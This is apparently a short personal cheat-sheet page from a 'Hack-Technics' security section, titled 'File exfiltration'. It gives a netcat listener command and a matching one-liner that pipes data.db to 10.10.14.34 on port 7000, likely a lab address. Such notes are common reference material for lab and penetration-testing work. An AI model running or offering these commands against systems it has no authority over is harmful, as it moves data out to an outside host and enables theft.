/security
Hack-Technics

security
network

File exfiltration

netcat

local receiver

nc -l -p 7000 -q 1 > remote_data.db < /dev/null

remote emitter

cat data.db  | netcat 10.10.14.34 7000

zar3bski

DataOps


By David Zarebski , 2025-04-08


On this page: